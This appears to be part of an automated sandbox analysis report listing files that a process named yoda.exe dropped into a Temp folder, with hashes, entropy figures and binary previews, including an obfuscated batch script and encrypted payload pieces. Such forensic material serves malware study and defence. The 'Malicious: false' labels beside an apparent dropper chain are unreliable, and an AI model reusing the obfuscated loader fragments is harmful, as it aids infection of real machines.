SSDEEP:	1536:j6LdTmHwANUQlHS3cctlxWboHdMJ3RraSXL21rKoUn9r5C03Eq30BcrTrhCX4aVb:cdTmRxlHS3NxrHSBRtNPnj0nEoXnmm
MD5:	0982457BBE3A894593EA6D9412C384D5
SHA1:	145FCB779C2F2345D0A7EC899F1017AB4CA8985D
SHA-256:	67D0216BC5041C505B069EE603F5F23C2D3B421BBB295E98B57613F5FDB3C4B1
SHA-512:	CA31FBB3B355C56E395B3FBF51E08201D28DA5D6A8928A879B3D73CCC23C9086260DC6DAE99E476CCF0CAD6586780E80510680AF44F10D56D3ACF1EFBB51D7E2
Malicious:	false
Preview:	.........@.............D...D..D...D.c.D.<.D...................I.}.D.f.D...D..D..D...D.A.D.A.D..D.u.@...D.}.D...D...............................................D..D.........B.D...D...............D..D...............D..D...D.<.D..D...D.C.D.C.D.{.D.;.D..D.Z.D...D...............................................D...D...D.H.D...D...D.D.D.$.D.z.D.p.D.p.D...D.Y.D.3.D...D...D...D.+.D.w.D...D...D.Y.D.\.D...D._.D.p.D.p.D.z.D...D...D..D...D...D.R.D.B.D...D...D.R.D...D...D.{.D.;.D...D.&.D...D...............................................D.m.D...D.u.D...D.}.D.&.D...D.D.D.p.D.p.D...D.W.D.W.D.Q.D.Q.D...D..D.s.D...D...D.E.D.=.D...D...D.p.D.p.D.o.D..D...D.D.D...D...D...D.}.D.U.D.%.D...D...D...D.>.D.'.D...D...D...D...............................................D...D...D.).D.J.D.k.D..@..@..@.p.D.p.D...D.9.D...D.Q.D...D...D...D...D...D...D..D.d.D.E.D.E.D.p.D.p.D...D...D...D.*.D.l.D.Hj........Y.......G..F...u.j.X........3.G.j.Z.........Q.....Y...s......&....G...+..E....P..qPQ........)w...

C:\Users\user\AppData\Local\Temp\Luther

Download File

Process:	C:\Users\user\AppData\Local\Temp\yoda.exe
File Type:	data
Category:	dropped
Size (bytes):	27325
Entropy (8bit):	7.99262325896768
Encrypted:	true
SSDEEP:	768:fyAe9CX0UkYoDhmfjGd7cwbfnTWC8AIukUNM:KAe9Q0SokfwYwTnTWCVIukUe
MD5:	7C0DC95463E8F2EAEAA833B21B1D3721
SHA1:	E49710DD4BD2E8DD5EDC0B9CE0672C1616A9D5C7
SHA-256:	9AC2205F7A8310DEB7EB1FBE56F010825EE35DAA0ABD5ECDC4EF242DDA72E429
SHA-512:	580A9B3E76E74651A0F2E93F0779406B192BA723ED09726E0F7A39CFD66EE81BC3A6AB8ECE459460925138B5D13B67D70ECFCD247F87537BDB39361B05C3837A
Malicious:	false
Preview:	.....%j.N.....I....,.G.g.\3[Z.........../)..S...k.....B.6.&Y..N.I.f%S>x...C.J...%....u.Gaf.uP6..,...b....\|.F.H;.qe..V.zG..Dz.b...P?.&..t....!..............o.r......q.).....O...4....i. .........M'..?..C...u....0..`.S.+....+=.....t.9....r`nL..pR..Qb.....ap^]{+...PQ9.....A.;.3..\\...L..g../#..NG....4....FB.,...c.>jh....~u......%.....v9..dqq._.Y!.w......K.z........l.;.A5....I. .4X.......s\G.....5i..A........Q..N../}.....h!sQ.N[)...I..i...3...G.`Rn..p..... o..X.G.x{)'...C....P... .......$Q.B;....M2V..6....^.l...V.R..s.Bo.....v.tNj....{1d..(.{......N.....=:.}t......)........E..Uy..p...}.6/2_.`cm.j4...>.l..DM.D......{..E..$.z.._........0../=..o..En.u^....W.`#....J....T.%...&....w..w.#.......v<.y3.! ....v........l#....p.$F.6..V..>g7..\.b.SmC.........fM.Nb.30.....Z..i+7b.E..~..Z.RA...2.........-[..#.9..B....s.(."S_..X.wy.........a....'..Z..03.ggv.PIy.Q../..#&R..^X..e..7bK.mW&f}C.W.R....9%2..r&..C.xK0....K.R..j.q....5.]/......oF..:

C:\Users\user\AppData\Local\Temp\Processor

Download File

Process:	C:\Users\user\AppData\Local\Temp\yoda.exe
File Type:	data
Category:	dropped
Size (bytes):	90112
Entropy (8bit):	7.997801753641097
Encrypted:	true
SSDEEP:	1536:LGiz9LPYD891pCnUV04q6xSSZ5+ocQaAgXf996eEuaEw5NBq+dphbm3tx:KgUDM1p0v+BFaZPEIw5NBq0hbktx
MD5:	6EFFC592B4E7AB9B6CB8A1D400A2A261
SHA1:	8E8788E1C5E7A0AB9ED3EF4C3E84DB5B14AA6024
SHA-256:	FA6A7139A0837090A962F516499C93870D152E9F5F3EF134049D02A76F8CC4C2
SHA-512:	10F9AA06D39A3FEF496D96809855C8EDE7675E54E078C9DF9F116D8457820514AA5B6DC72FFEDB686FF43FBC5658C5D740793C119498DD1C77157DA788F2FB48
Malicious:	false
Preview:	s.\|..>..z...b.B2.....c.N....;......X.....G.k6.4i.7.q..2.. K..8(.../0.4..W........,.+,6.`[J.}.......k:.>a....T<..U[..N..t....u.L......3....I...;q.....<.....D..A.k/Z.J.....n....L..T.c.~.S.....8m...Nx..H./k..A.,.j>^...D.J...@ yw...(.g..b8.".g..\...5X....0.]!.#..G=!.a.S....;...Hk..m..n Q8 V.K.4..{.W lu...........,..}..P..On.1.n.T..1'U.2...te.YC...zDl...k.....<.....!s.....-..Z..lm.F...E..u...5S.[..Z. .<...I-F".._...J...K.g..9.......B+..K....d.....f....]...cM...g.;.....q.0..N.../.h.....U.fR.!<..].o.X.O.qm...f..S...i.Fl.(....y/S...0..\.{...d.Y#s\|....H.n.7...u......d3U.!..........Y..B....D..[...6.]~3T x...=..<..\|........\............Xm.:A`.G...............g.9.n.^...-/.....6..f..L..z ..+..@m..c!%..OW....o....3..M.'.I....B.p..f...C..9.A:.ry.......{$.Q.}vs..-tw,\|..p./...>A.1ET..0\|{.E.l5Zg.+[...;A.-..`..............D:?....2.. .Z,..Y...f}Z.x>.[h......#.x..rh....Q..gR.........E..ZU.......p.S7..9..V<..=....R...pr.d*%:....H...Zs.....K.6\|XQ..&>qW.

C:\Users\user\AppData\Local\Temp\Qualifications

Download File

Process:	C:\Users\user\AppData\Local\Temp\yoda.exe
File Type:	COM executable for DOS
Category:	dropped
Size (bytes):	77824
Entropy (8bit):	7.99777398547034
Encrypted:	true
SSDEEP:	1536:3vX7epI7tC9102DsaOw02JjQBZwxXENwtBWjkgHroqPAlG3:KIk9qP5w02J9xFBWjk+V
MD5:	B17DF7BF2951CED3197BB87D753ED74E
SHA1:	338341F3B58676E50E017EABD5B4AA27F9870C8F
SHA-256:	703795E797AEDA04649711437B89B36B3D7FA1792D169049DD68739B6BDB7684
SHA-512:	8508D6F20369D7C4D150F8F956C2CB1C00EB1B9CA9E835215077F27B5C25C56EFC61100C22AC74715E7B2D9960D7322D19458022994872CE02BCE21D5741269A
Malicious:	false
Preview:	..^...Q.._n.D.+\.ua._$...b..F......_.M."............Y...~ld.....Q....>.VD...}.GX...Z.....f.B:.P.+.6.SCd..........u\|H4......)...y=-..`n.T,.Z...e.%.O....b.z5;)..5...u.p'.A.!yo.B..W)4n ........$.,.NkvT'.}...X..w.j...E..w...w.sU..u=...G.dR.N.+.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....R~...0.8.'.F...h..............R...\Y..R...\Y.kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r....R..,P..Myn.2..t.W....j..........&.R....T..R...\Y.m........r..5...x..2).U.j....R>.l#.~...........h...\|.@=.h....jX.4s)<.G...u...'......]q...WQ......L.a.$g...]..e.(.x .}.c..T2.x..%.B.'.r.....<...i..7J.K...7^ .SSX.s..E9-..O..-...V=.C.(x..k.^.....B....^.p5..Z.4p"5.@..t%..YN......jT...2..P(4.{\|.?>\|...

C:\Users\user\AppData\Local\Temp\River

Download File

Process:	C:\Users\user\AppData\Local\Temp\yoda.exe
File Type:	data
Category:	dropped
Size (bytes):	96256
Entropy (8bit):	6.667490743822929
Encrypted:	false
SSDEEP:	1536:0/UXT6TvY464qvI932eOypvcLSDOSpZ+Sh+I+FrbCyI7P4CxiG:0gF4qv+32eOyKODOSpQSAU4CV
MD5:	EF015F58D70380AC3218866597698966
SHA1:	BE6A0F9FAFE7594A012997658D2C1B9F6E30BF1F
SHA-256:	07910EE6CD2FF3054B8D20EB1DDA29B5B59D006531F1957EF79D6EE1921AB2FE
SHA-512:	B7936367B0DEDD7A79176288338EB3B1B688238C835702F3F1FBF279D86BB3CD590771928C91D63C0D6974576F6493E2D0884723747344331EDA4E8F05D2D09A
Malicious:	false
Preview:	W.F...F..~(.X..^4...u.......v,..F1P.v..6.........t...u..F44.J.W.v4.F<........u..F4,.J.W.v4.M...YY_.F8..^[..SV..W.F...F..~(.X..^4...u.......v,..F2P.v..6.q........t...u..F44.J.W.v4.F<......YY....u..F4,.J.j.W......._.F8..^[..U..VW..3..W49u.~%S....t.........G.....f..Ht.BBF;u.\|.[_..^].......u..Ak.........I...2..P.....Y..U..M.V.A......ujQ.Q......L.Y...t....t...?..k.0........M.....x).u"...t....t....?k.0....4...M..F-.t..j............2.....^]..U....@......t....x..t..1..E.P.....YY...u..E.......E...].....U....@......t....x..t..1.u....YY.....f;.u..E.......E...].....U.....A.;A..E.u..y..t...........@........@.....f.E.f.........].....U.......L.3.E.SV..W.~<.t].F8..~V.~43..te.......e..Pj..E.P.E.P.........u&9E.t!.v..F.P.u..E.P..H....Q...C;^8u....N.....v..F.P.v8..H....v4.+....M..._^3.[.......].....U..QQSV..W.~<.uV.F8..~O.^43...t^3.f.E..F.P...p..E.SP.........E...~..N.Q.u...H....}....].G;~8u....N.....v..F.P.v8..H....v4. ..._^..[..].....U..QQSV..W.~<.uV.F8..~O.^43...t^3.f.E..F.P...p

C:\Users\user\AppData\Local\Temp\Screensavers

Download File

Process:	C:\Users\user\AppData\Local\Temp\yoda.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	6.577510885905355
Encrypted:	false
SSDEEP:	1536:/q0vQEcmFdni8yDGVFE5gOHu1CwCMIBZwneAJu7QnswIPumV3BxZxu6/sPYcSyRb:y0Imbi80PtCZEMnVIPPBxT/sZt
MD5:	311773682D6D85B6F521EF3B119CF11F
SHA1:	0E2A985B418CA2157774AA6F36B104E725D60B8E
SHA-256:	C17A9505719E72543455A87ECE76DDD61553808DA69D9F854001DA7DFA0AD8FC
SHA-512:	3A84E28394D2CF1743CE0DCE4C3C4C6FA852E71FC2B1BA206FC5D5ACB56268412B2770418E0192234E6B91DE1452054C1E19EBA8AF105251611D268BA16BCFD3
Malicious:	false
Preview:	.L.3.E..C.V.s.W.....\|........t)...t ...t....t....t....urj...j...j...j...j._Q.F.PW.f.......uG.K....t....t....t..e.....E..F.......]..E..F.P.F.PQW..\|...P.E.P.=h.......\|...h....Q..m...>.YYt.."$....t.V.E$..Y..u..6..k..Y.M._3.^.;.....]..[..U..QQ.E....]..E...]..U...M.V..uG9E.u..R..........Z(........>.}..t.....9u.v..+..........3(......^].\|...j..u..u..u.........^]..U.....}........SVW.u..M..I...}........t..]...t..M.;.v..............'...N.E......u.QSW...........3+......M.QP......M.....QP........C.m..t...t.;.t.+..}..t..M...P...._..^[..3...].j.h(.L.....3..u........u..)...j.^.0.2'.....g...3.9E......t.}..t..E.%...........t.3..E..E.E..u..u..u..u..u.V.E.P.c.........}..E............t.......L....u..}.}..t%..t..........?k.0.....M..d.(..6.P..Y..U..Q.E..U...?SW.}(3....k.0.......M..D.(.u.3......V.u$...@..u%.E..].P.e...Y.........E.%.@..uC...@....%.@..=.@..tE=....t,=.@..t%=....t+=.@..t$=....t.=.@..u...............#.;.u..............t<.E.@u6.E......#...=...@t.=....tb;.u..E...t....vG...v

C:\Users\user\AppData\Local\Temp\Stating

Download File

Process:	C:\Users\user\AppData\Local\Temp\yoda.exe
File Type:	data
Category:	dropped
Size (bytes):	117760
Entropy (8bit):	6.605148628617209
Encrypted:	false
SSDEEP:	3072:RwS2u5hVOoQ7t8T6pUkBJR8CThpmESv+AqVnBypIbv18mLtZ:Rb2j6AUkB0CThp6vmVnjpZ
MD5:	A5D29F8CE1DA22315816936CCD7236F1
SHA1:	1E628E44C9FE3C81E2D0D141E3EF9A2C2B8B7149
SHA-256:	47AF929A8183BFB2F9C4D1156C692EB2106C6A795AF9EF70D06259FCD08FA015
SHA-512:	64CF178C52F206F8345BCDDA8CD6C62D24D74BE02ABF4F279F24A13437587C19F09DC7DE9DA41CB1EBD846DAE7B2D6DE60D2C4D19CEFCBC33F4A3D4F9FFE8820
Malicious:	false
Preview:	.I..........N..V........ E........ E...u........ ......~....... ......~....... ............ .O.........P....I..8...SW.M..i.......I.h......=..I......f..u.h..........f..t..~..u.h.....M.......E..P....h..........f..u.h..........f..t..~..u.h.....M.......E..P.~...j.......f..u.j.......f..t..~..u.j..M......E..P.G...j.......f..u.j.......f..t..~..u.j..M..^....E..P.....j[......f..u.j[..f..t..~..u.j[.M..,....E..P....._[^....U......$.E.SVW..j.P.F .N...3.~...\$..\$.f.\$.u$Sj.........D$...D$.P.^...P.L$......j@.L$$........M.W.\|......f........G..\|$.........!......H...t\|...tn..3t`...t.j.S...U..D$.P.D$$Pj}Y....YY..u.j.j{......3..F.f.F..\|$$.t..D$ ..P.....\|$.3..F.f.F..d....F...[....F...R....F...I....F...@....~..u..D$...P......t$...j......j..v ........L$ ...._^[..]...U....VW.}....~[S.M......u..4....]...t..E...P.8....F...P.v....E..P......E..P."......u...[t..F...P...._^....U.....E.SVW..j.P.F ....3.~...]..].f.].u!Sj...."....E...E.P....P.M........M.W......f..t...G.7...

C:\Users\user\AppData\Local\Temp\Suspended

Download File

Process:	C:\Users\user\AppData\Local\Temp\yoda.exe
File Type:	data
Category:	dropped
Size (bytes):	91136
Entropy (8bit):	6.575730405138497
Encrypted:	false
SSDEEP:	1536:x5fhjLueoMmOrrHL/uDoiouK+r5bLmbZzW9FfTubb1/Dde6YF640L6wy4Za9IN33:HfhnueoMmOqDoioO5bLezW9FfTut/Dd3
MD5:	0A48C24C59A56ED57E42FD60F1071434
SHA1:	838539401CA63F8C4AE67941BDF5C45A2995C124
SHA-256:	E9B513FFAEF42CD47785C86512804ECC4287D657A55853540D0019FAE45A654F
SHA-512:	83A7131DA5BDA289B7DB7F185C87DC735DE2488E0D38531CD7DD7FE14AB4E2D7EF61FCD0B76196C940DFBA3777E5938DB489518444FD6666B9DBB84EF5ED8293
Malicious:	false
Preview:	t$...t..L$..D$0P....-.t$..L$4..H...:.L$..D$0P.......L$..D$0P.9H...t$..L$4.>.....t$..L$4..N...D$0P.L$$.....t$@.L$d..<...D$ ..P.D$dP.u.......L$`..."G...L$0.!p...Q.t$@.L$d.<...D$...P.D$$P.D$hP.u..t$ .J......L$`.....F...........t$...W.u..N......L$@.F...L$P.o...L$ .D$ ..I..?....t$$.....Y_^[..]...U..E...pSV3.x..W..u....E....].E..E...I..M.].]..].]..]..E......E...H...u..M..].]..F..E..........uF.E......@.Ph.......X....M...F...M...o...M..E...I......u.........9....F.j5Y.M....].f9K..]..M.u(.u..M.;..u..M.t..E..M..0..F.....F..M.B.....jG..B....u.^f;.u........}.......t...B.Ph.....R....M.U.R...P...u....F......@.Ph.....+......E.PSV...f............E......F........A...U.f;E.......jNXf;.......jGXf;....................A..AjNXf9E.u).y..u#j..E..M.PSV...:...........u.S......}.......t...B.Ph................M.U.R...P.....S......F......@.Ph.........E..e......e....VPS.u..E..................E....@....f.x..t...@...Pjr._.........E....f..A.......u.M..9...E...P.E.P.E.P.E.Pj..:......M.....

C:\Users\user\AppData\Local\Temp\Throat

Download File

Process:	C:\Users\user\AppData\Local\Temp\yoda.exe
File Type:	ASCII text, with very long lines (724), with CRLF line terminators
Category:	dropped
Size (bytes):	13103
Entropy (8bit):	5.1296347890270395
Encrypted:	false
SSDEEP:	384:jYfuIJ6jWYKde+X7dV/xQqXroQxlwlkLEDjox8Y:jYW86jWpde+XLKqXrFxl7LEDKb
MD5:	B6F33D8858EEE8EB545EDF8A06D3CBA4
SHA1:	93D4D6E6BDFC6B2086FB108C218994086C899160
SHA-256:	84CF0BC1A0DA15140B9FFB08DE4AB73E0811680012402F095E1431B651FDA82A
SHA-512:	DFB7AFFE0EC547945FB5FB3250BC521D421AD5C189038B90C0A2C85E3D9F29530340CA80604B5F2195C94E62C62687EA07061C47591B9BD5B0D17DE770F2606F
Malicious:	false
Preview:	Set Specifics=I..iEGrown-Interested-Qualification-Latinas-Slave-Bibliographic-Beds-Volunteers-Constructed-..BdIiStates-Stamp-Grad-Listing-Crawford-Affected-Shirts-Section-..HyImplies-Becoming-Voluntary-Retro-Walter-Sucks-..stkMarvel-Polar-Rapid-Loaded-Trades-Image-Governmental-Timeline-..fRStuck-Processors-Out-Gateway-..EICSKyle-Partner-Systems-Deeply-Viruses-Messaging-Industries-..QMAccountability-Stanford-Standards-Knock-Lab-These-..OMwNotified-Photoshop-Bonds-..smRelevant-Holly-Precious-Wool-Slave-Command-..Set Returning=i..kzThreats-Surgeons-Routine-Province-Rest-Illustrated-..VjoDamages-Piece-Federation-Times-Visit-Cold-..tUBBWx-Thinking-Optimization-Jackets-..xyTourist-Rings-Worcester-Mug-Fellowship-Fact-Jacksonville-..HUkInterface-Qc-Term-Louisville-About-..tnCancel-Ky-..zBShoppingcom-Camp-Walking-Eyed-Lexmark-Capacity-Islamic-Rankings-..JNDProfessionals-Exclusion-Initially-Abstract-Estonia-Automobiles-..Set First=h..wvUJRemark-Y-Unlikely-Dance-Broadband-Motel-Perth-Parliamentar

C:\Users\user\AppData\Local\Temp\Throat.cmd

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (724), with CRLF line terminators
Category:	dropped
Size (bytes):	13103
Entropy (8bit):	5.1296347890270395
Encrypted:	false
SSDEEP:	384:jYfuIJ6jWYKde+X7dV/xQqXroQxlwlkLEDjox8Y:jYW86jWpde+XLKqXrFxl7LEDKb
MD5:	B6F33D8858EEE8EB545EDF8A06D3CBA4
SHA1:	93D4D6E6BDFC6B2086FB108C218994086C899160
SHA-256:	84CF0BC1A0DA15140B9FFB08DE4AB73E0811680012402F095E1431B651FDA82A
SHA-512:	DFB7AFFE0EC547945FB5FB3250BC521D421AD5C189038B90C0A2C85E3D9F29530340CA80604B5F2195C94E62C62687EA07061C47591B9BD5B0D17DE770F2606F
Malicious:	false
Preview:	Set Specifics=I..iEGrown-Interested-Qualification-Latinas-Slave-Bibliographic-Beds-Volunteers-Constructed-..BdIiStates-Stamp-Grad-Listing-Crawford-Affected-Shirts-Section-..HyImplies-Becoming-Voluntary-Retro-Walter-Sucks-..stkMarvel-Polar-Rapid-Loaded-Trades-Image-Governmental-Timeline-..fRStuck-Processors-Out-Gateway-..EICSKyle-Partner-Systems-Deeply-Viruses-Messaging-Industries-..QMAccountability-Stanford-Standards-Knock-Lab-These-..OMwNotified-Photoshop-Bonds-..smRelevant-Holly-Precious-Wool-Slave-Command-..Set Returning=i..kzThreats-Surgeons-Routine-Province-Rest-Illustrated-..VjoDamages-Piece-Federation-Times-Visit-Cold-..tUBBWx-Thinking-Optimization-Jackets-..xyTourist-Rings-Worcester-Mug-Fellowship-Fact-Jacksonville-..HUkInterface-Qc-Term-Louisville-About-..tnCancel-Ky-..zBShoppingcom-Camp-Walking-Eyed-Lexmark-Capacity-Islamic-Rankings-..JNDProfessionals-Exclusion-Initially-Abstract-Estonia-Automobiles-..Set First=h..wvUJRemark-Y-Unlikely-Dance-Broadband-Motel-Perth-Parliamentar

C:\Users\user\AppData\Local\Temp\Tracking

Download File

Process:	C:\Users\user\AppData\Local\Temp\yoda.exe
File Type:	apollo a88k COFF executable not stripped - version 3331
Category:	dropped
Size (bytes):	73340
Entropy (8bit):	7.1076887681952545
Encrypted:	false
SSDEEP:	1536:gWyu0uZo2+9BGmdATGODv7xvTphAiPChgZ2kOE6:gWy4ZNoGmROL7F1G7ho2kOb
MD5:	81D8E62A5A05761FAF80605B4259904D
SHA1:	9FDAB7D6AF0D7C6074A0E5CDBF209C7EACC220C5
SHA-256:	0813BA189ADB7CB556DD997A0A1448C4885CF692423BDAE823565AB68A33DAB8
SHA-512:	79FBD2F4A2F7A9185DE26AD366B4EFBD3DD9E3CC793367C6A059A911ED13D0712B70CE521AFEE0BE3FF553E6DB6A7EB40F47BA7C05D1D0DC7D27308CCC6043C3
Malicious:	false
Preview:	.....Ak. 5.7.!.3...70...i.3..... .. ........DB~".....E......m.~#.L.{............(..T.Y/V.._frq......u..6J...E.lQ,W(U....u[0...I._...>Z.&....h.T....0...B.-[U.....=..x<........k.D".$"?.........ln...e.....SX+Q.X....\H.Y=B.\|&.....1....:"t&...`...Z..?...Q....C..B..m....d.{1e.X..V.p}:..,.s,-o`..}G......X8.pO....;..>Z.>\|..4.ATU..e..eY.....@}].A....'h...e..V".Z..L.7..36[.X..%.A.I.g...)..b..-DB......Z..m..i..b.X.#.......a....~....+.e..k.]..d...e...T..)[.3.........&.HGI.B.C.f..5.K.gT..D"........b..\|.0.O.O7..W,....S.+\..2...\|~...o..[...#..;.a.'AwL:..l).U....U.r2......w~CD....M5..4.so..x....f...,...lO..n0..H..Hk...(...f.3.L..Au...H........v..m.....U.m.f...6.....Q....8"...yh$....;...........U..'......w.......&...k...F...eN].....V.=..A"..3.#..]..:"...1....Tu..=U..d2....&...;l.._D.W..F.NU(...>...s\..]...HDZ..spg..]1...FN#*0...`.......=.x..r...../.......W'........,..<.t..P.};..7.b.'A...3.3...?.................K....y^.6.....WK.......!..`.`.....A...3..oU....8.0.P....

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2tte35zi.drs.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bgpxgtqe.a2i.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dbjuhdrl.byj.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fzeq40wd.eps.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h3fcoatl.004.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hqk4ajak.hk1.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ifojc5hq.iiu.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jcme44ju.qdf.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pstuxu50.qrq.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rlyyznyj.tgt.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
